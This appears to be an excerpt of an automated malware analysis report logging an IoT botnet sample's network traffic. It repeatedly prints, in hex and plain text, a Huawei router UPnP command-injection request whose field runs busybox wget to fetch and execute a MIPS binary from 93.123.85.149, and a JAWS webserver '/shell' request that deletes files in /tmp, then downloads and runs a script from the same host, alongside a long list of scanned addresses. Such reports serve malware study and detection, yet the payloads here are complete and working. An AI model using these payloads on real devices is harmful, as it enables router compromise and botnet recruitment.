3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 64.54.119.203
      Source: unknownTCP traffic detected without corresponding DNS query: 170.248.197.248
      Source: unknownTCP traffic detected without corresponding DNS query: 129.220.80.103
      Source: unknownTCP traffic detected without corresponding DNS query: 117.138.202.103
      Source: unknownTCP traffic detected without corresponding DNS query: 38.53.92.228
      Source: unknownTCP traffic detected without corresponding DNS query: 211.226.6.238
      Source: unknownTCP traffic detected without corresponding DNS query: 219.153.197.17
      Source: unknownTCP traffic detected without corresponding DNS query: 90.7.192.57
      Source: unknownTCP traffic detected without corresponding DNS query: 169.133.112.182
      Source: unknownTCP traffic detected without corresponding DNS query: 40.54.67.160
      Source: unknownTCP traffic detected without corresponding DNS query: 99.185.166.120
      Source: unknownTCP traffic detected without corresponding DNS query: 122.204.91.24
      Source: unknownTCP traffic detected without corresponding DNS query: 189.63.146.85
      Source: unknownTCP traffic detected without corresponding DNS query: 43.149.25.96
      Source: unknownTCP traffic detected without corresponding DNS query: 107.51.90.161
      Source: unknownTCP traffic detected without corresponding DNS query: 47.217.106.239
      Source: unknownTCP traffic detected without corresponding DNS query: 115.170.151.100
      Source: unknownTCP traffic detected without corresponding DNS query: 171.150.192.240
      Source: unknownTCP traffic detected without corresponding DNS query: 83.2.191.142
      Source: unknownTCP traffic detected without corresponding DNS query: 37.239.200.13
      Source: unknownTCP traffic detected without corresponding DNS query: 68.180.177.41
      Source: unknownTCP traffic detected without corresponding DNS query: 9.1.132.51
      Source: unknownTCP traffic detected without corresponding DNS query: 91.9.1.31
      Source: unknownTCP traffic detected without corresponding DNS query: 8.133.87.156
      Source: unknownTCP traffic detected without corresponding DNS query: 138.160.247.119
      Source: unknownTCP traffic detected without corresponding DNS query: 221.4.76.111
      Source: unknownTCP traffic detected without corresponding DNS query: 191.233.255.95
      Source: unknownTCP traffic detected without corresponding DNS query: 116.211.249.184
      Source: unknownTCP traffic detected without corresponding DNS query: 20.71.185.18
      Source: unknownTCP traffic detected without corresponding DNS query: 32.91.153.228
      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.45.186
      Source: unknownTCP traffic detected without corresponding DNS query: 130.230.153.198
      Source: unknownTCP traffic detected without corresponding DNS query: 91.134.252.250
      Source: unknownTCP traffic detected without corresponding DNS query: 183.117.16.20
      Source: unknownTCP traffic detected without corresponding DNS query: 166.120.217.32
      Source: unknownTCP traffic detected without corresponding DNS query: 89.68.60.58
      Source: unknownTCP traffic detected without corresponding DNS query: 197.254.250.237
      Source: unknownTCP traffic detected without corresponding DNS query: 60.13.93.198
      Source: unknownTCP traffic detected without corresponding DNS query: 34.183.56.250
      Source: unknownTCP traffic detected without corresponding DNS query: 46.66.80.32
      Source: unknownTCP traffic detected without corresponding DNS query: 150.19.217.93
      Source: unknownTCP traffic detected without corresponding DNS query: 94.36.217.238
      Source: unknownTCP traffic detected without corresponding DNS query: 157.118.212.42
      Source: unknownTCP traffic detected without corresponding DNS query: 193.232.105.228
      Source: unknownTCP traffic detected without corresponding DNS query: 23.146.245.144
      Source: unknownTCP traffic detected without corresponding DNS query: 145.14.128.219
      Source: unknownTCP traffic detected without corresponding DNS query: 186.9.159.171
      Source: unknownTCP traffic detected without corresponding DNS query: 74.192.242.49
      Source: unknownTCP traffic detected without corresponding DNS query: 220.190.19.104
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
